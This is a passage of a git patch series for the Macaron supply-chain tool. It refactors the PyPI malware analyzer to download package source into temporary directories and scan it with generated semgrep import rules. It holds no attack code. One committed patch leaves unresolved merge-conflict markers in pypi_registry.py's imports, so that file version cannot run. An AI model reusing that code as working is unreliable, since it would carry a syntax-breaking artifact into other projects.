- # "Error finding target '%s' in zip file '%s': %s", archive_target, 
source_file, zip_key_exception - # ) - # return None + with zipfile.ZipFile(source_file, "r") as sourcecode_zipfile: + for info in sourcecode_zipfile.infolist(): + if not info.is_dir(): + with sourcecode_zipfile.open(info) as file_obj: + sourcecode[info.filename] = file_obj.read() + + except (zipfile.BadZipFile, zipfile.LargeZipFile) as zipfile_error: + error_msg = f"Error reading source code zip file: {zipfile_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) from zipfile_error + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + return sourcecode def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +385,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: The source code of the package hosted on PyPI + package_sourcecode: dict + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +517,19 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in the package_sourcecode attribute. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. 
""" - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. 
Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) From 735123b775afdfae211b4a3a2c775daa3b84bb59 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 20 Jan 2025 14:13:09 +1000 Subject: [PATCH 02/37] build: updated project to include semgrep as an experimental dependency --- Makefile | 2 +- pyproject.toml | 4 ++++ src/macaron/config/defaults.ini | 2 +- 3 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 029cdc163..dc39b88a6 100644 --- a/Makefile +++ b/Makefile @@ -206,7 +206,7 @@ upgrade: .venv/upgraded-on .venv/upgraded-on: pyproject.toml python -m pip install --upgrade pip python -m pip install --upgrade wheel - python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker] + python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker,experimental] $(MAKE) upgrade-quiet force-upgrade: rm -f .venv/upgraded-on diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..fa86bf95e 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -107,6 +107,10 @@ test-docker = [ "ruamel.yaml >=0.18.6,<1.0.0", ] +experimental = [ + "semgrep == 1.102.0", +] + [project.urls] Homepage = "https://github.com/oracle/macaron" Changelog = "https://github.com/oracle/macaron/blob/main/CHANGELOG.md" diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 99be0b7bd..acae98d55 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -602,5 +602,5 @@ epoch_threshold = 3 day_publish_error = 4 # yaml configuration file containing suspicious patterns. 
Can be full path or relative to -# folder where macaron is installed +# folder where macaron is installed. This will be normalised to the OS path type. suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml From e3b44008ef89d3ce8a55eba3f13df10d87eb3245 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 23 Jan 2025 11:48:34 +1000 Subject: [PATCH 03/37] refactor: support for semgrep as the code analysis tool --- src/macaron/errors.py | 4 + .../sourcecode/pypi_sourcecode_analyzer.py | 231 ++++++------------ .../checks/detect_malicious_metadata_check.py | 5 +- .../package_registry/pypi_registry.py | 131 +++++++--- 4 files changed, 183 insertions(+), 188 deletions(-) diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index a616c8e57..e835f874d 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -11,16 +11,20 @@ import base64 import binascii import ipaddress +import json import logging import os import re -from dataclasses import dataclass +import subprocess # nosec +import tempfile +from collections import defaultdict +from typing import Any import yaml from macaron.config.defaults import defaults from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError -from macaron.json_tools import JsonType +from 
macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset @@ -31,21 +35,6 @@ CALLS = "calls" -@dataclass(frozen=True) -class Import: - """Data class to hold information about extracted import statements. - - Name, alias, and module are referring to the following patterns of python import statements: - - [from ] import [as ] - """ - - name: str - alias: str | None - module: str | None - lineno: int - statement: str - - class PyPISourcecodeAnalyzer: """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. @@ -70,6 +59,7 @@ class PyPISourcecodeAnalyzer: def __init__(self) -> None: """Collect required data for analysing the source code.""" self.suspicious_patterns = self._load_defaults() + self.rule_files: list = [] def _load_defaults(self) -> dict[str, dict[str, list]]: """Load the suspicious pattern from suspicious_pattern.yaml. @@ -106,7 +96,7 @@ def _load_defaults(self) -> dict[str, dict[str, list]]: with open(filename, encoding="utf-8") as file: configured_patterns: dict[str, JsonType] = yaml.safe_load(file) except FileNotFoundError as file_error: - error_msg = f"Unable to open locate {filename}" + error_msg = f"Unable to locate {filename}" logger.debug(error_msg) raise ConfigurationError(error_msg) from file_error except yaml.YAMLError as yaml_error: @@ -162,44 +152,60 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu HeuristicAnalyzerValueError if there is no source code available. 
""" - analysis_result: dict = {} + analysis_result: defaultdict = defaultdict(list) + semgrep_commands: list[str] = ["semgrep", "scan"] result: HeuristicResult = HeuristicResult.PASS - source_code = pypi_package_json.package_sourcecode - if not source_code: - error_msg = "Unable to retrieve PyPI package source code" + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - for filename, content in source_code.items(): - detail_info = {} + self._create_rules() + for rule_file in self.rule_files: + semgrep_commands.extend(["--config", rule_file.name]) + semgrep_commands.append(source_code_path) + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") try: - _ = ast.parse(content) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error - imports = self._extract_imports(content) - import_names = set() - for i in imports: - if i.module: - import_names.add(".".join([i.module, i.name])) - import_names.add(i.name) + if process.returncode != 0: + error_msg = f"Error running semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) - for category, patterns in self.suspicious_patterns[IMPORTS].items(): - category_info = [] + semgrep_output = 
json.loads(output_json_file.read()) - suspicious_imports = set.intersection(import_names, set(patterns)) - if suspicious_imports: - category_info = [i for i in imports if i.name in suspicious_imports] - result = HeuristicResult.FAIL + if not semgrep_output: + return result, {} - detail_info[category] = category_info + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} - analysis_result[filename] = {IMPORTS: detail_info} + result = HeuristicResult.FAIL # some semgrep rules were triggered + for finding in semgrep_findings: + category = json_extract(finding, ["check_id"], str) + if not category: + continue - return result, analysis_result + file = json_extract(finding, ["path"], str) + start = json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + analysis_result[category].append({"file": file, "start": start, "end": end}) + + self._clear_rules() + + return result, dict(analysis_result) def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious dataflow. @@ -253,122 +259,43 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu return result, analysis_result - def _extract_imports(self, content: str) -> set[Import]: - try: - return self._extract_imports_from_ast(content) - except SyntaxError: - return self._extract_imports_from_lines(content) + def _create_rules(self) -> None: + rule_list: list[dict[str, Any]] = [] + contents: dict = {} - def _extract_imports_from_ast(self, content: str) -> set[Import]: - """Extract imports from source code using the parsed AST. + if self.rule_files: + self._clear_rules() - Parameters - ---------- - source_content: str - The source code as a string. 
+ # import rules + for category, patterns in self.suspicious_patterns[IMPORTS].items(): + rule: dict[str, Any] = {} + pattern_list: list = [] - Returns - ------- - set[str] - The set of imports. + rule["id"] = category + rule["severity"] = "ERROR" + rule["languages"] = ["python"] + rule["message"] = f"Detected suspicious imports from the '{category}' category" - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(Import(alias.name, alias.asname, None, alias.lineno, "")) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - for name in node.names: - imports.add(Import(name.name, name.asname, _module, name.lineno, "")) - return imports - - def _extract_imports_from_lines(self, content: str) -> set[Import]: - """Extract imports from source code using per line pattern matching. + for pattern in patterns: + pattern_list.append({"pattern": f"import {pattern}"}) + pattern_list.append({"pattern": f"from {pattern} import $X"}) + pattern_list.append({"pattern": f'__import__("{pattern}")'}) - Parameters - ---------- - source_content: str - The source code as a string. + rule["pattern-either"] = pattern_list + rule_list.append(rule) - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. 
- # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for lineno, line in enumerate(content.splitlines()): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue + contents = {"rules": rule_list} + + with tempfile.NamedTemporaryFile( + "w", prefix=f"{IMPORTS}_", suffix=".yaml", delete=False + ) as import_patterns_file: + yaml.dump(contents, import_patterns_file) + self.rule_files.append(import_patterns_file) - if match.group(1): - # Standard import, handle commas and aliases if present. 
- splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(Import(split, None, None, lineno, "")) - elif match.group(2): - # From import - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(Import(split, None, match.group(2), lineno, "")) - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results + def _clear_rules(self) -> None: + for file in self.rule_files: + file.close() + self.rule_files.clear() class DataFlowTracer(ast.NodeVisitor): diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9e1e8dd42..b7d54e72a 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -279,7 +279,8 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, - package_sourcecode={} + package_sourcecode={}, + package_sourcecode_path="" ) pypi_registry_info.metadata.append(pypi_package_json) @@ -310,6 +311,8 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.LOW result_type = CheckResultType.FAILED + pypi_package_json.cleanup_sourcecode() + result_tables.append( MaliciousMetadataFacts( result=heuristic_results, diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 04db1d2e2..4d6e1e125 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ 
b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,12 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable from dataclasses import dataclass from datetime import datetime @@ -17,7 +19,12 @@ from requests import RequestException from macaron.config.defaults import defaults +<<<<<<< HEAD from macaron.errors import ConfigurationError, InvalidHTTPResponseError +======= +from macaron.database.table_definitions import Component +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError +>>>>>>> 0de258c9 (refactor: support for semgrep as the code analysis tool) from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -159,7 +166,10 @@ def download_package_json(self, url: str) -> dict: return res_obj - def download_package_sourcecode(self, url: str) -> dict: + def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: """Download the package source code from pypi registry. Parameters @@ -169,35 +179,55 @@ def download_package_sourcecode(self, url: str) -> dict: Returns ------- - dict[str: bytes] - A dictionary of filenames and file contents. + tuple[dict[str, bytes], str] + A dictionary of filenames and file contents, and the temp directory with the source code. """ sourcecode: dict = {} # Get name of file. 
_, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) # temporary directory to unzip and read all source files - with tempfile.TemporaryDirectory() as temp_dir: - response = send_get_http_raw(url, stream=True) - if response is None: - error_msg = f"Unable to find package source code using URL: {url}" - logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as stream_error: - error_msg = f"Error while streaming source file: {stream_error}" - logger.debug(error_msg) - raise InvalidHTTPResponseError from RequestException + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from 
RequestException - if tarfile.is_tarfile(source_file): + if tarfile.is_tarfile(source_file.name): try: - with tarfile.open(source_file, "r:gz") as sourcecode_tar: + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + for member in sourcecode_tar.getmembers(): if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): sourcecode[member.name] = file_obj.read() @@ -205,27 +235,32 @@ def download_package_sourcecode(self, url: str) -> dict: except tarfile.ReadError as read_error: error_msg = f"Error reading source code tar file: {read_error}" logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) from read_error + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) - elif zipfile.is_zipfile(source_file): - try: - with zipfile.ZipFile(source_file, "r") as sourcecode_zipfile: - for info in sourcecode_zipfile.infolist(): - if not info.is_dir(): - with sourcecode_zipfile.open(info) as file_obj: - sourcecode[info.filename] = file_obj.read() - - except (zipfile.BadZipFile, zipfile.LargeZipFile) as zipfile_error: - error_msg = f"Error reading source code zip file: {zipfile_error}" - logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) from zipfile_error + raise InvalidHTTPResponseError(error_msg) from read_error else: error_msg = f"Unable to extract source code from file {file_name}" logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + 
raise InvalidHTTPResponseError(error_msg) - return sourcecode + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return sourcecode, temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -388,6 +423,9 @@ class PyPIPackageJsonAsset: #: The source code of the package hosted on PyPI package_sourcecode: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -528,8 +566,31 @@ def download_sourcecode(self) -> bool: url = self.get_sourcecode_url() if url: try: - self.package_sourcecode = self.pypi_registry.download_package_sourcecode(url) + self.package_sourcecode, self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode( + url + ) return True except InvalidHTTPResponseError as error: logger.debug(error) return False + + def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this. 
+ """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=self._handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception From c2ef74eb829f3453641e3c834e27104a0e2b41b4 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 23 Jan 2025 14:31:28 +1000 Subject: [PATCH 04/37] fix: entire source code is no longer stored in memory --- .../sourcecode/pypi_sourcecode_analyzer.py | 47 +++---- .../package_registry/pypi_registry.py | 132 ++++++++++++++---- 2 files changed, 125 insertions(+), 54 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index e835f874d..d372c4fd3 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -23,7 +23,7 @@ import yaml from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset @@ -231,31 +231,30 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu analysis_result: dict = {} result: HeuristicResult = HeuristicResult.SKIP - source_code = pypi_package_json.package_sourcecode - if not source_code: + try: + for filename, content in pypi_package_json.iter_sourcecode(): + try: 
+ _ = ast.parse(content.decode("utf-8")) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue + + # tracer = DataFlowTracer() + # tracer.generate_symbol_table(content) + + # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) + # is_malware, detail_info = functioncall_analyzer.analyze(content) + # if is_malware: + # result = HeuristicResult.FAIL + + # # TODO: Currently, the result collector does not handle the situation that + # # multiple same filename. In the future, this will be replace with absolute path. + # if detail_info: + # analysis_result[filename] = detail_info + except SourceCodeError as sourcecode_error: error_msg = "Unable to retrieve PyPI package source code" logger.debug(error_msg) - raise HeuristicAnalyzerValueError(error_msg) - - for filename, content in source_code.items(): - try: - _ = ast.parse(content) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue - - # tracer = DataFlowTracer() - # tracer.generate_symbol_table(content) - - # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - # is_malware, detail_info = functioncall_analyzer.analyze(content) - # if is_malware: - # result = HeuristicResult.FAIL - - # # TODO: Currently, the result collector does not handle the situation that - # # multiple same filename. In the future, this will be replace with absolute path. 
- # if detail_info: - # analysis_result[filename] = detail_info + raise HeuristicAnalyzerValueError(error_msg) from sourcecode_error return result, analysis_result diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 4d6e1e125..4fa5d1855 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -10,7 +10,7 @@ import tarfile import tempfile import urllib.parse -from collections.abc import Callable +from collections.abc import Callable, Iterator from dataclasses import dataclass from datetime import datetime @@ -33,6 +33,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -166,10 +170,7 @@ def download_package_json(self, url: str) -> dict: return res_obj - def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: - raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") - - def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: + def download_package_sourcecode(self, url: str) -> str: """Download the package source code from pypi registry. Parameters @@ -179,11 +180,14 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: Returns ------- - tuple[dict[str, bytes], str] - A dictionary of filenames and file contents, and the temp directory with the source code. - """ - sourcecode: dict = {} + str + The temp directory with the source code. + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. 
+ """ # Get name of file. _, _, file_name = url.rpartition("/") package_name = re.sub(r"\.tar\.gz$", "", file_name) @@ -195,7 +199,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: error_msg = f"Unable to find package source code using URL: {url}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -214,7 +218,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: error_msg = f"Error while streaming source file: {stream_error}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -228,15 +232,11 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: sourcecode_tar.extractall(temp_dir, filter="data") - for member in sourcecode_tar.getmembers(): - if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): - sourcecode[member.name] = file_obj.read() - except tarfile.ReadError as read_error: error_msg = f"Error reading source code tar file: {read_error}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -245,11 +245,16 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: raise 
InvalidHTTPResponseError(error_msg) from read_error + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and re.sub(".tar.gz$", "", file_name) == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: error_msg = f"Unable to extract source code from file {file_name}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -260,7 +265,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: raise InvalidHTTPResponseError(error_msg) logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) - return sourcecode, temp_dir + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -420,9 +425,6 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict - #: The source code of the package hosted on PyPI - package_sourcecode: dict - #: the source code temporary location name package_sourcecode_path: str @@ -556,7 +558,7 @@ def get_latest_release_upload_time(self) -> str | None: return None def download_sourcecode(self) -> bool: - """Get the source code of the package and store it in the package_sourcecode attribute. + """Get the source code of the package and store it in a temporary directory. 
Returns ------- @@ -566,26 +568,22 @@ def download_sourcecode(self) -> bool: url = self.get_sourcecode_url() if url: try: - self.package_sourcecode, self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode( - url - ) + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) return True except InvalidHTTPResponseError as error: logger.debug(error) return False - def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: - raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") - def cleanup_sourcecode(self) -> None: """ Delete the temporary directory created when downloading the source code. - The package source code is no longer accessible after this. + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. """ if self.package_sourcecode_path: try: - shutil.rmtree(self.package_sourcecode_path, onerror=self._handle_temp_dir_clean) + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) self.package_sourcecode_path = "" except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( @@ -594,3 +592,77 @@ def cleanup_sourcecode(self) -> None: ) logger.debug(tempdir_exception_msg) raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an 